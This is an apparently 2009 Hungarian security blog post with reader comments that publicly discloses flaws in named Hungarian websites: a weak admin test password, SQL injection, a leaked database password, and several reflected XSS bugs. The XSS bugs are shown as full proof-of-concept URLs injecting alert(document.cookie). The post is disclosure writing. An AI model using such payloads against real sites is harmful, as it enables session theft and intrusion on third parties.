Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Heti termés

2009.09.25. 12:00 | buherator | 10 komment

Mivel a komolyabb hibákat jeleztem az üzemeltetők felé, visszajelzést viszont nem kaptam, íme a nagy magyar valóság:

A hétvégén érkezett néhány érdekesség a postaládámba. Ptzool például a mav.hu adminisztrátori szekciójában vette észre, hogy a teszt felhasználó jelszava, khm...nem kifejezetten erős. Egyébként az egész oldal átjáróháznak tűnik, ráférne némi glettelés...

Frissítés: A kedves MÁV informatikás kollegák valahova áttették az admin felületet, miután megkapták az e-mailem (nem lett volna egyszerűbb rendes jelszavakat választani...), válaszolni persze már nem volt erejük. Sebaj, a site ettől ugyanúgy törhető marad...

Szicsu pedig egy rakat XSS-ről küldött tájékoztatást:

http://www.ok.hu/katalogus?q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&mode=1&hol=1

http://depo.hu/kereses-%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%20%3E

http://www.mindigtv.hu/SearchResult.aspx?searchStr=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://halatortan.tv2.hu/index.php?action=receptkereso&keyword=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sztar=1&olvaso=1&x=23&y=4

http://rtlklub.hu/archivum?keyword=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&type=1&year_from=2004&month_from=01&day_from=01&year_until=2009&month_until=09&day_until=20&page=&channel=

http://www.hirtv.hu/?application=holmessearch&holmessearch_resid=887334&holmessearch_type=Advanced&holmessearch_artpage=1&holmessearch_productpage=1&holmessearch_exclsite=&holmessearch_inclsite=&holmessearch_fragment=2&holmessearch_exclude=&holmessearch_pageing=0&holmessearch_idonsite=&holmessearch_sortbydate=1&holmessearch_searchText=%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&holmessearch_how=3&holmessearch__search=keres%E9s&holmessearch_contenttypearticle=1&holmessearch_contenttypeforum=0&holmessearch_contenttypeproduct=0

http://atv.hu/kereses ( postol és getre nem lehet rávenni, tehát csak játszani lehet: "<script>alert(document.cookie)</script> )

Egy magát megnevezni nem kívánó illető az egyébként remek programnak ígérkező Kutatók Éjszakája oldalában talált elég triviális SQL injection sebezhetőségeket, végül pedig a StarBlog-on jelent meg egy kép, amin a Pécsi Közlekedési Zrt. okádja ki magából az adatbázisjelszót csak úgy spontán. Nem mintha amúgy nem lehetne triviálisan szétrontani az alkalmazást...

Remélem olvassák az illetékesek...

Címkék: az olvasó ír

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

_2501 2009.09.25. 23:01:10

XSSWarrior for the win!!!!

Gratulálok, minden elismeresem ezekhez a remek, remek XSSekhez.
Biztosan faradtsagos munka volt megtalalni ezeket az igen veszelyes sebezhetosegeket ilyen nagy nevu es jol vedett weboldalakon, melyek mogott veteran programozok es feketeoves biztonsagtechnikai szakemberek hada 24/7 dolgozik a lehetseges biztonsagi resek felkutatasan es kijavitasan.
A tehetseg az tehetseg, nincs mese...

_2501 2009.09.25. 23:06:12

xssed.com -on is van xss, 1 korso sor jar erte. :)

matx 2009.09.26. 00:42:07

On uram, kicsit cinikusnak tunik. =)

_2501 2009.09.26. 02:18:22

igen? nemtom mitol lehet... :)

buherator · http://buhera.blog.hu 2009.09.26. 12:22:37

@_2501: Igen, kéne már írjak egy disclosure policyt, de azért az ITBN-es kioszk buherálásal ez szerintem jól összevágott ;)

_2501 2009.09.26. 16:09:34

@buherator: elkaptam a labdát, elkaptam :"D Jah, mondom én, xsswarrior 4 the win :DD

m1key · http://rootsite.hu 2009.09.27. 12:56:18

nlcafe.hu-n van csunya sql hiba, irtam nekik, de arra nem meltattak, hogy visszairjanak, pedig sanoma serveren van, hotdog.com, storyonline, citromail stb... :D startlap :)

szoval a szakemberek annyira foltozgatjak az oldalt, hogy kozben email nincs idejuk olvasni...

_2501 2009.09.27. 13:04:53

hmm... lehet hogy inditani kene egy kulon blogot/weboldalt annak hogy ki, hol, milyen hibat talalt?